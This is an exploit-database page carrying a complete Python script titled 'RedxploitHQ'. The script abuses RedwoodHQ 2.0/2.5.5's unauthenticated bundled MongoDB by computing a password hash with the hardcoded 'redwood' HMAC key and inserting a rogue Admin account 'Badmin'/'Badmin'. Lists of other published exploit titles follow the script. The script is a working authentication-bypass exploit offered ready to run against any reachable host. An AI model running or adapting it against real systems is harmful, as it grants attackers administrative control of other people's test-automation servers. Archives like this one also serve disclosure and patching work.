Menu

Search for hundreds of thousands of exploits

"RedwoodHQ 2.5.5 - Authentication Bypass"

Author

Exploit author

EthicalHCOP

Platform

Exploit platform

multiple

Release date

Exploit published date

2019-06-17

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
# -*- encoding: utf-8 -*-
#!/usr/bin/python3

# Exploit Title:   RedxploitHQ (Create Admin User by missing authentication on db)
# Date: 	       14-june-2019
# Exploit Author:  EthicalHCOP
# Version: 	       2.0 / 2.5.5
# Vendor Homepage: https://redwoodhq.com/
# Software Link:   https://redwoodhq.com/redwood-download/
# Tested on: 	   Ubuntu and Windows.
# Twitter:	       @EthicalHcop
# Usage:           python3 RedxploitHQ.py -H mongo_host -P mongo_port
# Description: 	   Use RedxploitHQ to create a new Admin user into redwoodhq and get all the functions on the framework
# 
# RedwoodHQ doesn't require that MongoDB is installed on the machine because this tool have  her own Mongo Launcher. 
# The problem is that this vendor database doesn't require any authentication to read her data. 
# So, I use the same syntax that use the Framework to create my admin user on the database and access into the tool
# 
# POC:             https://youtu.be/MK9AvoJDtxY

import hashlib
import hmac
import optparse
from pymongo import MongoClient

def CreateHMAC(Pass):
    message = bytes(Pass,encoding='utf8')
    secret = bytes('redwood',encoding='utf8')
    hash = hmac.new(secret, message, hashlib.md5)
    return (hash.hexdigest())

def DbConnect(ip,port):
    uri = "mongodb://" + ip + ":" + port + "/"
    con = MongoClient(uri)
    return con

def DbDisconnect(con):
    con.close()

def CreateBadminUser(ip, port, user, passw):
    con = DbConnect(ip, port)
    db = con.automationframework
    usr = db.users
    passw = CreateHMAC(passw)
    data = {
        "name": user,
        "password": passw,
        "tag": [],
        "role": "Admin",
        "username": user,
        "status": ""
    }
    usr.insert_one(data)
    DbDisconnect(con)

def start():
    parser = optparse.OptionParser('usage %prog ' + \
                                   '-H host -P port')
    parser.add_option('-P', '--Port', dest='port', type='string', \
                      help='MongoDB Port')
    parser.add_option('-H', '--Host', dest='host', type='string', \
                      help='MongoDB Host')
    (options, args) = parser.parse_args()
    ip = options.host
    port = options.port
    if (str(ip) == "None"):
        print("Insert Host")
        exit(0)
    if (str(port) == "None"):
        port = "27017"
    try:
        CreateBadminUser(str(ip), str(port), 'Badmin', 'Badmin')
        print("[+] New user 'Badmin'/'Badmin' created.")
    except Exception as e:
        print("[-] Can't create the 'Badmin'/'Badmin' user. Error: "+str(e))

if __name__ == '__main__':
    start()
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
Release Date Title Type Platform Author
2019-06-17 "RedwoodHQ 2.5.5 - Authentication Bypass" webapps multiple EthicalHCOP 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected